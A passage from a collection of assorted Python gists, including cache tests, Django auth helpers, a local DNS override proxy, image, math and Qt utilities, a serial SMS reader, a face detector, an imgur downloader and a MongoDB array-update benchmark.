def test_delete_post(self):
url = build_url('/%s/' % TEST_BLOG)
post_id = self.new_post(TEST_BLOG)
response = self.get_twice(url)
self.assertHit(response)
self.delete_post(TEST_BLOG, post_id)
response = requests.get(url)
self.assertMiss(response)
def test_preview_post(self):
post_id = self.new_post(TEST_BLOG)
post = self.get_post(TEST_BLOG, post_id)
response = self.get_twice('%s?preview=true' % post.permalink)
self.assertMiss(response)
def test_new_comment(self):
post_id = self.new_post(TEST_BLOG)
post = self.get_post(TEST_BLOG, post_id)
response = self.get_twice(post.permalink)
self.assertHit(response)
self.new_comment(TEST_BLOG, post_id)
response = requests.get(post.permalink)
self.assertMiss(response)
def test_edit_comment(self):
post_id = self.new_post(TEST_BLOG)
post = self.get_post(TEST_BLOG, post_id)
comment_id = self.new_comment(TEST_BLOG, post_id)
response = self.get_twice(post.permalink)
self.assertHit(response)
self.edit_comment(TEST_BLOG, comment_id)
response = requests.get(post.permalink)
self.assertMiss(response)
def test_delete_comment(self):
post_id = self.new_post(TEST_BLOG)
post = self.get_post(TEST_BLOG, post_id)
comment_id = self.new_comment(TEST_BLOG, post_id)
response = self.get_twice(post.permalink)
self.assertHit(response)
self.delete_comment(TEST_BLOG, comment_id)
response = requests.get(post.permalink)
self.assertMiss(response)
def test_new_comments_purge_too_much(self):
# Comments were incorrectly busting site root
post_id = self.new_post(TEST_BLOG)
url = build_url('/')
response = self.get_twice(url)
self.assertHit(response)
self.new_comment(TEST_BLOG, post_id)
response = requests.get(url)
self.assertHit(response)
if __name__ == '__main__':
unittest.main()
```
#### File: hard-gists/1088273/snippet.py
```python
from scipy.misc import imread, imsave
from scipy import mean, interp, ravel, array
from itertools import izip
import sys
def mkcurve(chan1,chan2):
"Calculate channel curve by averaging target values."
fst = lambda p: p[0]
snd = lambda p: p[1]
sums = {}
for v1, v2 in izip(ravel(chan1), ravel(chan2)):
old = sums.get(v1, [])
sums.update({v1: old + [v2]})
c = array( [ (src,mean(vals))
for src,vals in sorted(sums.iteritems()) ])
nvals = interp(range(256), c[:,0], c[:,1], 0, 255)
return dict(zip(range(256), nvals))
def correct_bad(good, bad):
"Match colors of the bad image to good image."
r, g, b = bad.transpose((2,0,1))
r2, g2, b2 = good.transpose((2,0,1))
rc = mkcurve(r,r2)
gc = mkcurve(g,g2)
bc = mkcurve(b,b2)
corr = bad.copy()
h, w = corr.shape[:2]
for row in xrange(h):
for col in xrange(w):
r,g,b = corr[row,col]
corr[row,col] = [rc[r], gc[g], bc[b]]
return corr
if __name__ == "__main__":
good, bad, saveas = sys.argv[1:1+3]
good = imread(good)
bad = imread(bad)
assert(good.shape == bad.shape)
corrected = correct_bad(good,bad)
imsave(saveas, corrected)
```
#### File: hard-gists/10a742de43246210f3ba/snippet.py
```python
import gensim
import codecs
from gensim.models import Word2Vec
import json
def export_to_file(path_to_model, output_file):
output = codecs.open(output_file, 'w' , 'utf-8')
model = Word2Vec.load_word2vec_format(path_to_model, binary=True)
vocab = model.vocab
for mid in vocab:
#print(model[mid])
print(mid)
vector = list()
for dimension in model[mid]:
vector.append(str(dimension))
#line = { "mid": mid, "vector": vector }
vector_str = ",".join(vector)
line = mid + "\t" + vector_str
#line = json.dumps(line)
output.write(line + "\n")
output.close()
```
#### File: hard-gists/1118585/snippet.py
```python
from progress_ui import Ui_Dialog
from PyQt4 import QtCore, QtGui
import sys, time
class mythread(QtCore.QThread):
def __init__(self,parent,n):
QtCore.QThread.__init__(self,parent)
self.n=n
def run(self):
self.emit(QtCore.SIGNAL("total(PyQt_PyObject)"),self.n)
i=0
while (i<self.n):
if (time.time() % 1==0):
i+=1
#print str(i)
self.emit(QtCore.SIGNAL("update()"))
# create the dialog for zoom to point
class progress(QtGui.QDialog):
def __init__(self):
QtGui.QDialog.__init__(self)
# Set up the user interface from Designer.
self.ui = Ui_Dialog()
self.ui.setupUi(self)
self.ui.progressBar.setValue(0)
self.t=mythread(self,100)
QtCore.QObject.connect(self.t, QtCore.SIGNAL("total(PyQt_PyObject)"), self.total)
QtCore.QObject.connect(self.t, QtCore.SIGNAL("update()"), self.update)
self.n=0
self.t.start()
def update(self):
self.n+=1
print self.n
self.ui.progressBar.setValue(self.n)
def total(self,total):
self.ui.progressBar.setMaximum(total)
if __name__=="__main__":
app = QtGui.QApplication([])
c=progress()
c.show()
sys.exit(app.exec_())
```
#### File: hard-gists/11192605/snippet.py
```python
import numpy as np
from scipy.linalg import lu, inv
def gausselim(A,B):
"""
Solve Ax = B using Gaussian elimination and LU decomposition.
A = LU decompose A into lower and upper triangular matrices
LUx = B substitute into original equation for A
Let y = Ux and solve:
Ly = B --> y = (L^-1)B solve for y using "forward" substitution
Ux = y --> x = (U^-1)y solve for x using "backward" substitution
:param A: coefficients in Ax = B
:type A: numpy.ndarray of size (m, n)
:param B: dependent variable in Ax = B
:type B: numpy.ndarray of size (m, 1)
"""
# LU decomposition with pivot
pl, u = lu(A, permute_l=True)
# forward substitution to solve for Ly = B
y = np.zeros(B.size)
for m, b in enumerate(B.flatten()):
y[m] = b
# skip for loop if m == 0
if m:
for n in xrange(m):
y[m] -= y[n] * pl[m,n]
y[m] /= pl[m, m]
# backward substitution to solve for y = Ux
x = np.zeros(B.size)
lastidx = B.size - 1 # last index
for midx in xrange(B.size):
m = B.size - 1 - midx # backwards index
x[m] = y[m]
if midx:
for nidx in xrange(midx):
n = B.size - 1 - nidx
x[m] -= x[n] * u[m,n]
x[m] /= u[m, m]
return x
if __name__ == '__main__':
x = gausselim(np.array([[3, 2], [1, -4]]), np.array([[5], [10]]))
print x
```
#### File: hard-gists/1125832/snippet.py
```python
import sys
from IPython.core.debugger import Pdb
from IPython.core import ipapi
def set_trace():
ip = ipapi.get()
def_colors = ip.colors
Pdb(def_colors).set_trace(sys._getframe().f_back)
def post_mortem(tb):
ip = ipapi.get()
def_colors = ip.colors
p = Pdb(def_colors)
p.reset()
while tb.tb_next is not None:
tb = tb.tb_next
p.interaction(tb.tb_frame, tb)
def pm():
post_mortem(sys.last_traceback)
```
#### File: hard-gists/11284662/snippet.py
```python
import select
import socket
import sys
import objc
from PyObjCTools import AppHelper
objc.loadBundle("CoreBluetooth", globals(),
bundle_path=objc.pathForFramework(u'/System/Library/Frameworks/IOBluetooth.framework/Versions/A/Frameworks/CoreBluetooth.framework'))
blebee_service = CBUUID.UUIDWithString_(u'EF080D8C-C3BE-41FF-BD3F-05A5F4795D7F')
blebee_rx = CBUUID.UUIDWithString_(u'A1E8F5B1-696B-4E4C-87C6-69DFE0B0093B')
blebee_tx = CBUUID.UUIDWithString_(u'1494440E-9A58-4CC0-81E4-DDEA7F74F623')
class RobotDelegate(object):
def __init__(self):
self.manager = None
self.peripheral = None
self.service = None
self.rx = None
self.tx = None
self.comms = None
def centralManagerDidUpdateState_(self, manager):
print repr(manager), "done it!"
self.manager = manager
manager.scanForPeripheralsWithServices_options_([blebee_service], None)
def centralManager_didDiscoverPeripheral_advertisementData_RSSI_(self, manager, peripheral, data, rssi):
self.peripheral = peripheral
manager.connectPeripheral_options_(peripheral, None)
def centralManager_didConnectPeripheral_(self, manager, peripheral):
print repr(peripheral)
self.peripheral.setDelegate_(self)
self.peripheral.discoverServices_([blebee_service])
def centralManager_didFailToConnectPeripheral_error_(self, manager, peripheral, error):
print repr(error)
def centralManager_didDisconnectPeripheral_error_(self, manager, peripheral, error):
print repr(error)
AppHelper.stopEventLoop()
def peripheral_didDiscoverServices_(self, peripheral, services):
self.service = self.peripheral.services()[0]
self.peripheral.discoverCharacteristics_forService_([blebee_rx, blebee_tx], self.service)
def peripheral_didDiscoverCharacteristicsForService_error_(self, peripheral, service, error):
print repr(service)
print repr(error)
for characteristic in self.service.characteristics():
if characteristic.UUID() == blebee_rx:
self.rx = characteristic
self.peripheral.setNotifyValue_forCharacteristic_(True, self.rx)
elif characteristic.UUID() == blebee_tx:
self.tx = characteristic
print repr(self.rx.UUID())
print repr(self.tx.UUID())
def peripheral_didWriteValueForCharacteristic_error_(self, peripheral, characteristic, error):
print repr(error)
def peripheral_didUpdateNotificationStateForCharacteristic_error_(self, peripheral, characteristic, error):
print "Receiving notifications"
def peripheral_didUpdateValueForCharacteristic_error_(self, peripheral, characteristic, error):
self.comms.send(characteristic.value().bytes().tobytes())
print repr(characteristic.value().bytes().tobytes())
def shutdown(self):
if self.peripheral is not None:
self.manager.cancelPeripheralConnection_(self.peripheral)
else:
AppHelper.stopEventLoop()
def send(self, byte):
byte = NSData.dataWithBytes_length_(byte, 1)
self.peripheral.writeValue_forCharacteristic_type_(byte, self.tx, 0)
class CommsManager(object):
def __init__(self, robot):
self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listener.bind(("127.0.0.1", 9999))
self.listener.listen(1)
self.connection = None
self.robot = robot
self.robot.comms = self
def loop(self):
endpoints = [sys.stdin, self.listener]
if self.connection is not None:
endpoints.append(self.connection)
r, w, e = select.select(endpoints, [], [], 0)
if sys.stdin in r:
delegate.shutdown()
return
if self.listener in r:
self.connection, _ = self.listener.accept()
if self.connection in r:
c = self.connection.recv(1)
if len(c) == 0:
print "closed"
self.connection.close()
self.connection = None
elif c not in ('\r', '\n'):
print repr(c)
self.robot.send(c)
AppHelper.callLater(0.1, self.loop)
def send(self, data):
while len(data):
sent = self.connection.send(data)
data = data[sent:]
delegate = RobotDelegate()
manager = CBCentralManager.alloc()
manager.initWithDelegate_queue_options_(delegate, None, None)
comms = CommsManager(delegate)
print repr(manager)
AppHelper.callLater(0.1, comms.loop)
AppHelper.runConsoleEventLoop()
```
#### File: hard-gists/1140136/snippet.py
```python
import urlparse
from django.contrib.auth import REDIRECT_FIELD_NAME, login
from django.contrib.auth.forms import AuthenticationForm
from django.http import HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.generic.edit import FormView
from django.conf import settings
class LoginView(FormView):
"""
This is a class based version of django.contrib.auth.views.login.
Usage:
in urls.py:
url(r'^login/$',
AuthenticationView.as_view(
form_class=MyCustomAuthFormClass,
success_url='/my/custom/success/url/),
name="login"),
"""
form_class = AuthenticationForm
redirect_field_name = REDIRECT_FIELD_NAME
template_name = 'registration/login.html'
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, *args, **kwargs):
return super(LoginView, self).dispatch(*args, **kwargs)
def form_valid(self, form):
"""
The user has provided valid credentials (this was checked in AuthenticationForm.is_valid()). So now we
can log him in.
"""
login(self.request, form.get_user())
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
if self.success_url:
redirect_to = self.success_url
else:
redirect_to = self.request.REQUEST.get(self.redirect_field_name, '')
netloc = urlparse.urlparse(redirect_to)[1]
if not redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
# Security check -- don't allow redirection to a different host.
elif netloc and netloc != self.request.get_host():
redirect_to = settings.LOGIN_REDIRECT_URL
return redirect_to
def set_test_cookie(self):
self.request.session.set_test_cookie()
def check_and_delete_test_cookie(self):
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
return True
return False
def get(self, request, *args, **kwargs):
"""
Same as django.views.generic.edit.ProcessFormView.get(), but adds test cookie stuff
"""
self.set_test_cookie()
return super(LoginView, self).get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
"""
Same as django.views.generic.edit.ProcessFormView.post(), but adds test cookie stuff
"""
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
self.check_and_delete_test_cookie()
return self.form_valid(form)
else:
self.set_test_cookie()
return self.form_invalid(form)
```
#### File: hard-gists/1140516/snippet.py
```python
from django.contrib.auth.models import User, SiteProfileNotAvailable
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.signals import post_init
from django.dispatch.dispatcher import receiver
@receiver(post_init, sender=User)
def user_post_init(sender, instance, **kwargs):
def get_profile():
user = instance
if not hasattr(user, '_profile_cache'):
from django.conf import settings
if not getattr(settings, 'AUTH_PROFILE_MODULE', False):
raise SiteProfileNotAvailable('You need to set AUTH_PROFILE_MODULE in your project settings')
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
except ValueError:
raise SiteProfileNotAvailable('app_label and model_name should be separated by a dot in the AUTH_PROFILE_MODULE setting')
try:
model = models.get_model(app_label, model_name)
if model is None:
raise SiteProfileNotAvailable('Unable to load the profile model, check AUTH_PROFILE_MODULE in your project settings')
user._profile_cache, _ = model._default_manager.using(user._state.db).get_or_create(user=user)
user._profile_cache.user = user
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
return user._profile_cache
instance.get_profile = get_profile
```
#### File: hard-gists/11405336/snippet.py
```python
import sys
from gi.repository import Gtk
from gi.repository import Gio
from gi.repository import Granite
class Application(Gtk.Application):
def __init__(self):
Gtk.Application.__init__(self,
flags=Gio.ApplicationFlags.FLAGS_NONE)
self.license_type = Gtk.License.GPL_3_0
def do_activate(self):
self.window = Granite.WidgetsLightWindow.new("Tareas")
self.window.set_resizable(False)
self.window.set_keep_above(False)
self.window.set_position(Gtk.WindowPosition.CENTER)
self.window.set_size_request(350, 430)
welcome = Granite.WidgetsWelcome.new('No hay tareas', 'Excelente!')
self.window.add(welcome)
self.add_window(self.window)
self.window.show_all()
def do_startup(self):
Gtk.Application.do_startup(self)
def do_shutdown(self):
Gtk.Application.do_shutdown(self)
def on_quit(self, widget, data):
self.quit()
if __name__ == '__main__':
application = Application()
application.run(None)
```
#### File: hard-gists/1147973/snippet.py
```python
import socket
from twisted.internet.protocol import Factory, Protocol
from twisted.internet import reactor
from twisted.names import dns
from twisted.names import client, server
CHANGE = 'example.com'
TO = '127.0.0.1'
TTL = 60
class DNSServerFactory(server.DNSServerFactory):
def gotResolverResponse(self, (ans, auth, add), protocol, message, address):
qname = message.queries[0].name.name
if CHANGE in qname:
for answer in ans:
if answer.type != dns.A:
continue
if CHANGE not in answer.name.name:
continue
answer.payload.address = socket.inet_aton(TO)
answer.payload.ttl = TTL
args = (self, (ans, auth, add), protocol, message, address)
return server.DNSServerFactory.gotResolverResponse(*args)
verbosity = 0
resolver = client.Resolver(servers=[('192.168.127.12', 53)])
factory = DNSServerFactory(clients=[resolver], verbose=verbosity)
protocol = dns.DNSDatagramProtocol(factory)
factory.noisy = protocol.noisy = verbosity
reactor.listenUDP(53, protocol)
reactor.listenTCP(53, factory)
reactor.run()
```
#### File: hard-gists/1160696/snippet.py
```python
import base64
from myapplication import app
class MyTestCase(unittest.TestCase):
def setUp(self):
self.app = app.test_client()
def tearDown(self):
pass
def open_with_auth(self, url, method, username, password):
return self.app.open(url,
method=method,
headers={
'Authorization': 'Basic ' + base64.b64encode(username + \
":" + password)
}
)
def test_login(self):
res = self.open_with_auth('/user/login', 'GET', 'username',
'password')
```
#### File: hard-gists/1165344/snippet.py
```python
import os
from django.conf import settings
from django.contrib.staticfiles.finders import BaseFinder, AppDirectoriesFinder
from django.contrib.staticfiles.storage import AppStaticStorage
from django.core.files.storage import FileSystemStorage
from django.utils._os import safe_join
class AppMediaStorage(AppStaticStorage):
source_dir = 'media'
class MediaFinder(AppDirectoriesFinder):
storage_class = AppMediaStorage
class MediaRootFinder(BaseFinder):
"""
Since the static files runserver can not find media definitions, it is now
added by this finder. This way you don't have to define anything in urls.py
to make django server both static and media files.
"""
def find(self, path, all=False):
"""
Looks for files in the MEDIA_ROOT
"""
media_prefix = settings.MEDIA_URL.replace(settings.STATIC_URL, '')
if path.startswith(media_prefix):
location = safe_join(settings.STATIC_ROOT, path)
if os.path.exists(location):
if not all:
return location
return [location]
return []
def list(self, ignore_patterns):
"""
List all files in all locations.
"""
yield settings.MEDIA_ROOT, FileSystemStorage()
```
#### File: hard-gists/1177373/snippet.py
```python
import redis
from scrapy.dupefilter import BaseDupeFilter
from scrapy.utils.request import request_fingerprint
class RedisDupeFilter(BaseDupeFilter):
def __init__(self, host, port):
self.redis = redis.Redis(host, port)
@classmethod
def from_settings(cls, settings):
host = settings.get('REDIS_HOST', 'localhost')
port = settings.get('REDIS_PORT', 6379)
return cls(host, port)
def request_seen(self, request):
fp = request_fingerprint(request)
added = self.redis.sadd('fingerprints', fp)
return not added
```
#### File: hard-gists/1262332/snippet.py
```python
import serial
import time
from messaging.sms import SmsDeliver
ser=serial.Serial('/dev/ttyACM0', baudrate=9600, timeout=.1, rtscts=0)
def sendCommand(com):
ser.write(com+"\r\n")
time.sleep(2)
ret = []
while ser.inWaiting() > 0:
msg = ser.readline().strip()
msg = msg.replace("\r","")
msg = msg.replace("\n","")
if msg!="":
ret.append(msg)
return ret
def readSMS():
print("LOOKING FOR SMS")
list = sendCommand("AT+CMGL=0")
ret = []
for item in list:
#print item
if item.startswith("+CMGL:") == False:
if item!="OK":
ret.append(SmsDeliver(item))
return ret
def killSMS():
print("DELETING ALL MESSAGES")
print sendCommand("AT+CMGD=1,1")
def main():
return
print("SENDING HELLO")
com="ERROR"
count=0
while(com!="OK"):
com=sendCommand("AT")[0]
count+=1
if(count>5):
print "COULD NOT GET A HELLO, all I got was "+com
return
print("OK")
print("CHANGING MESSAGE FORMAT")
print(sendCommand("AT+CMGF=0")[0])
while(True):
sms = readSMS()
for s in sms:
print ""
print "SMS"
print s.text
time.sleep(1)
time.sleep(6)
killSMS()
if __name__ == "__main__":
if ser.isOpen():
main()
else:
print "ERROR: CAN't OPEN CONNECTION"
ser.close()
```
#### File: hard-gists/1264102/snippet.py
```python
from sys import modules
import gc
import inspect
import six
from django.core.management.base import BaseCommand
from django.dispatch.dispatcher import Signal, WeakMethod
FORMATS = {
'vim': '{path}:{line}:{name}',
'human': '{name} in line {line} of {path}',
}
class Command(BaseCommand):
help = 'Show all signals receivers'
def add_arguments(self, parser):
parser.add_argument('--line_format', choices=FORMATS.keys(), default='human',
help='Line format (available choices: {0})'.format(', '.join(FORMATS))
)
def handle(self, *args, **options):
line_format = options['line_format']
if line_format not in FORMATS:
raise CommandError('format must be on of {0}, not {1}'.format(line_format, FORMATS.keys()))
msg = FORMATS[line_format]
signals = [obj for obj in gc.get_objects() if isinstance(obj, Signal)]
for signal in signals:
for receiver in signal.receivers:
_, receiver = receiver
func = receiver()
name = func.__qualname__ if six.PY3 else func.__name__
print(msg.format(name=name, line=inspect.getsourcelines(func)[1], path=inspect.getsourcefile(func)))
```
#### File: hard-gists/1269098/snippet.py
```python
import sys
import cv
class FaceDetect():
def __init__(self):
cv.NamedWindow ("CamShiftDemo", 1)
device = 0
self.capture = cv.CaptureFromCAM(device)
capture_size = (320,200)
cv.SetCaptureProperty(self.capture, cv.CV_CAP_PROP_FRAME_WIDTH, capture_size[0])
cv.SetCaptureProperty(self.capture, cv.CV_CAP_PROP_FRAME_HEIGHT, capture_size[1])
def detect(self):
cv.CvtColor(self.frame, self.grayscale, cv.CV_RGB2GRAY)
#equalize histogram
cv.EqualizeHist(self.grayscale, self.grayscale)
# detect objects
faces = cv.HaarDetectObjects(image=self.grayscale, cascade=self.cascade, storage=self.storage, scale_factor=1.2,\
min_neighbors=2, flags=cv.CV_HAAR_DO_CANNY_PRUNING)
if faces:
#print 'face detected!'
for i in faces:
if i[1] > 10:
cv.Circle(self.frame, ((2*i[0][0]+i[0][2])/2,(2*i[0][1]+i[0][3])/2), (i[0][2]+i[0][3])/4, (128, 255, 128), 2, 8, 0)
def run(self):
# check if capture device is OK
if not self.capture:
print "Error opening capture device"
sys.exit(1)
self.frame = cv.QueryFrame(self.capture)
self.image_size = cv.GetSize(self.frame)
# create grayscale version
self.grayscale = cv.CreateImage(self.image_size, 8, 1)
# create storage
self.storage = cv.CreateMemStorage(128)
self.cascade = cv.Load('haarcascade_frontalface_default.xml')
while 1:
# do forever
# capture the current frame
self.frame = cv.QueryFrame(self.capture)
if self.frame is None:
break
# mirror
cv.Flip(self.frame, None, 1)
# face detection
self.detect()
# display webcam image
cv.ShowImage('CamShiftDemo', self.frame)
# handle events
k = cv.WaitKey(10)
if k == 0x1b: # ESC
print 'ESC pressed. Exiting ...'
break
sys.exit(1)
if __name__ == "__main__":
print "Press ESC to exit ..."
face_detect = FaceDetect()
face_detect.run()
```
#### File: hard-gists/1306719/snippet.py
```python
from html.parser import HTMLParser
from urllib import request
import os.path
import re
import json
import sys
class ImgListScraper( HTMLParser ):
IMG_URL = "http://i.imgur.com/{hash}{ext}"
def __init__( self, *args, **kwargs ):
super().__init__( *args, **kwargs )
self.in_javascript = False
self.data = None
def handle_starttag( self, tag, attrs ):
attrs = dict( attrs )
if tag == "script" and attrs['type'] == "text/javascript":
self.in_javascript = True
def handle_data( self, data ):
if self.in_javascript:
img_block = False
for line in data.splitlines():
if line.find("ImgurAlbum") > -1:
img_block = True
elif img_block and line.strip().startswith("images:"):
data = line.strip()[ len( "images: " ) : -1 ]
self.data = json.loads( data )
img_block = False
self.in_javascript = False
def img_urls( self ):
for image in self.data['items']:
yield self.IMG_URL.format( **{
'hash': image['hash'],
'ext': image['ext']
})
def download_image( url, folder ):
path = os.path.join( folder, url.split("/")[-1] )
res = request.urlopen( url )
with open( path, 'wb' ) as f:
f.write( res.read() )
res.close()
def download_album( album_url, folder ):
print( "Scraping album..." )
scraper = ImgListScraper()
html = request.urlopen( album_url ).read().decode( 'utf8' )
scraper.feed( html )
total = scraper.data['count']
for ( pos, img_url ) in enumerate( scraper.img_urls() ):
print( "downloading {img_url} ({pos} of {total})".format(
img_url = img_url,
pos = pos,
total = total ) )
download_image( img_url, folder )
if __name__ == '__main__':
if len( sys.argv ) < 3:
print( "Usage: {script} ALBUM_URL FOLDER".format( script = sys.argv[0]
) )
else:
download_album( sys.argv[1], sys.argv[2] )
```
#### File: hard-gists/1367378/snippet.py
```python
import sys
import pymongo
import time
import getopt
import copy
from pymongo import Connection
from pymongo.database import Database
from datetime import datetime, timedelta
from locale import atoi
import random
import math
import threading
import logging
from Queue import Queue
def get_mongo_db(host):
connection = Connection(host,
port=27017)
db = Database(connection, "atest")
db.set_profiling_level(0)
return db
def generate_uuids(num, length=6):
results = []
for i in range(num):
val = random.randint(0,2**(length*8))
results.append("%x" % val)
return results
def generate_and_insert_ids(coll, doc_template, num_docs, prepad, associative, logger):
logger.debug("Starting uuid generation and insertion")
uuids = generate_uuids(num_docs)
start = time.time()
for uuid in uuids:
doc_template["uuid"] = uuid
coll.insert(doc_template, None, safe=False)
if prepad:
coll.update({"uuid" : uuid} ,{ "$set" : { "logs" : [] }})
if associative:
coll.update({"uuid" : uuid} ,{ "$set" : { "logs" : {} }})
logger.debug("done inserting initial documents: %s ms\n" % ((time.time() - start) * 1000))
return uuids
class DBUpdater(threading.Thread):
def __init__(self, collection_name, queue, host):
self.queue = queue
threading.Thread.__init__(self)
self.db = get_mongo_db(host)
self.coll = self.db[collection_name]
self.daemon = True
def stop(self):
self.queue.put(None)
def run(self):
while True:
args = self.queue.get(True)
if args == None:
break
# self.coll.find(args[0])[0] # just to warm the cache, don't think we need it
self.coll.update(args[0], args[1], upsert=args[2], safe=args[3])
def run_test(num_docs = 100,
list_length = 1000,
entry_size = 300,
prepad = False,
in_place = False,
safe_write = False,
associative = False,
group_sub_list = 0,
num_threads = 2,
verbose = False,
host = "localhost"):
#settings / constants
time_buckets = 15
outer_loop_delay_ms = 100
inner_loop_delay_ms = 0
logger = logging.Logger(__name__)
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
if verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# locals
filler = "x" * entry_size
padding = []
dt = datetime.today()
db = get_mongo_db(host)
args = """num_docs: %d
array_element_size: %d
list_length: %d
prepad: %s
in_place: %s
safe_write: %s
associative: %s
group_sub_list: %d
num_threads: %d
""" % (num_docs,
entry_size,
list_length,
prepad,
in_place,
safe_write,
associative,
group_sub_list,
num_threads )
# argument processing
if group_sub_list == 0:
group_sub_list = list_length
if in_place:
padding = map( lambda f : filler, range(list_length))
elif prepad:
padding = "x" * (list_length * entry_size)
elif group_sub_list < list_length:
padding = {}
for hr in range(int(math.ceil(list_length / group_sub_list))):
padding["%d" % hr] = {"hr" : hr, "vals": [] }
doc_template = {
"day" : dt.day,
"month" : dt.month,
"year" : dt.year,
"logs" : padding,
}
# loop variables
counter = 0
dbwait_table = 0
times = []
coll = db.arraytest
time_div = float(list_length) / time_buckets
start = time.time()
# start doing something
coll.drop() # clean it out
coll.ensure_index([("uuid",pymongo.ASCENDING)])
uuids = generate_and_insert_ids(coll,
doc_template,
num_docs,
prepad,
associative,
logger)
oldidx = 0
i = 0
max_i = list_length * num_docs
update_start = time.time()
update_queue = Queue(num_threads * 2)
updaters = []
for j in range(num_threads):
updaters.append(DBUpdater("arraytest", update_queue, host))
updaters[j].start()
j += 1
while counter < list_length:
t1 = time.time()
idx = int(math.floor( i * time_buckets / max_i))
sublist_idx = counter / group_sub_list
if oldidx < idx:
logger.debug("\n%d of %d (%d of %d updates)" % ( idx + 1, time_buckets, i, max_i))
oldidx = idx
for uuid in uuids:
upsert_dict = {"$push" : { "logs" : filler }}
query = { "uuid" : uuid }
if group_sub_list < list_length:
query = {"uuid" : uuid }
upsert_dict = {"$push" : {"logs.%d.vals" % sublist_idx : filler }}
if associative:
upsert_dict = {"$set" : {"logs.%d" % counter : filler }}
if in_place:
upsert_dict = {"$set" : {"logs.%d" % counter : filler }}
if group_sub_list == 1:
# just insert, no updates
doc_template["uuid"] = uuid + "%d" % counter
doc_template["logs"] = filler
coll.insert(doc_template)
else:
update_queue.put( [query, upsert_dict, True, safe_write], True)
if verbose and (i % 100 == 0):
sys.stdout.write(".")
sys.stdout.flush()
i += 1
time.sleep(inner_loop_delay_ms / 1000)
insert_time = time.time() - t1
if len(times) <= idx:
times.append(0)
times[idx] += insert_time * 1000 / time_div / num_docs
counter += 1
time.sleep(outer_loop_delay_ms / 1000)
# shut down worker threads
logger.debug("stopping threads...")
for updater_thread in updaters:
updater_thread.stop()
logger.debug("joining threads...")
for updater_thread in updaters:
updater_thread.join()
logger.info("updates took %d ms" % ((time.time() - update_start)*1000))
print args
for i, timey in enumerate(times):
logger.info("%d: %f" % (i, timey))
return times
def expand_array(arglist):
i = 0
result = []
for arg in arglist:
if type(arg) == list:
results = []
for val in arg:
subarg = copy.deepcopy(arglist)
subarg[i] = val
results.extend(expand_dict(subarg))
return results
else:
result.append(arg)
i += 1
return [result]
def expand_dict(target):
i = 0
result = {}
for key, val in target.iteritems():
if type(val) == list:
results = []
for subval in val:
# split it into one dict for each value in the array and recurse
target_clone = copy.deepcopy(target)
target_clone[key] = subval
results.extend(expand_dict(target_clone))
return results
else:
result[key] = val
i += 1
return [result]
def usage():
print """
NAME
%s - measure mongo $push performance on arrays of a set size for a specified collection size
SYNOPSIS
%s: [ OPTIONS ]
DESCRIPTION
Run a test of a mongo database with a variety of parameters. Allows simple comparison of
different parameter values. If multiple parameters are passed in for any arguments,
run multiple tests on the cross product of all possible combinations and print out a
summary of the results on completion.
-a, --associative { y | n | yn | y,n } default False
add entries as key - value pairs under the logs field instead of pushing then onto an array
-g --group_sub_list=sub_list_size
place entries in multiple lists under hash keys. List length is limited to sub_list_size.
-h, --help
print this usage info
-o, --host
mongodb host name or ip
-i, --in_place { y | n | yn | y,n } default False
create the entire document at the start, and simply $set the values in the loop
not compatible with -a
-l, --list_length=length default 1000
how many entries to add to the list in each document
-n, --num_docs=num default 100
total number of independent documents to create and fill
-p, --prepad { y | n | yn | y,n } default False
create documents with their ultimate size from the start, then immediately delete the padding
-s, --entry_size=size default 300
the size, in bytes, of each entry in the arrays. It is just a string of 'x' characters
-t, --num_threads=num default 2
the number of threads to use to update
-v, --verbose
print verbose info to console
-w, --safe_write { y | n | yn | y,n } default False
use the safe write flag (safe = True) for all updates and inserts
""" % (__file__, __file__)
def main():
dt = datetime.today() # - timedelta(days=5)
argv = sys.argv
# if this fails, add this to the environment:
# export PYTHONPATH=$PYTHONPATH:.. (or wherever ears_tools is
try:
opts, args = getopt.getopt(argv[1:], "hn:l:s:p:i:w:a:g:t:o:v", ["help",
"num_docs=",
"list_length=",
"entry_size=",
"prepad=",
"in_place=",
"safe_write=",
"associative=",
"group_sub_list=",
"num_threads=",
"host="
"verbose",
])
except getopt.GetoptError:
usage()
sys.exit(2)
args = { "num_docs" : 100,
"list_length" : 1000,
"entry_size" : 300,
"prepad" : False,
"in_place" : False,
"safe_write" : False,
"associative" : False,
"group_sub_list" : 0,
"num_threads" : 2,
"verbose" : False,
"host" : "localhost"
}
bool_map = { "y" : True, "n" : False, "yn" : [True,False], "y,n" : [True,False] }
try :
for opt, arg in opts:
if opt in ("-h", "--help"):
#TODO write usage
usage()
sys.exit()
elif opt in ("-n", "--num_docs"):
args["num_docs"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-l", "--list_length"):
args["list_length"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-s", "--entry_size"):
args["entry_size"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-p", "--prepad"):
args["prepad"] = bool_map.get(arg, "True")
elif opt in ("-i", "--in_place"):
args["in_place"] = bool_map.get(arg, "True")
elif opt in ("-w", "--safe_write"):
args["safe_write"] = bool_map.get(arg, "True")
elif opt in ("-a", "--associative"):
args["associative"] = bool_map.get(arg, "True")
elif opt in ("-g", "--group_sub_list"):
args["group_sub_list"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-o", "--host"):
args["host"] = arg
elif opt in ("-t", "--num_threads"):
args["num_threads"] = map( lambda x : atoi(x), arg.split(","))
elif opt in ("-v", "--verbose"):
args["verbose"] = True
except Exception:
usage()
sys.exit(2)
argsetlist = expand_dict(args)
print "Running %d times, with the following argument sets: " % len(argsetlist)
for i, argset in enumerate(argsetlist):
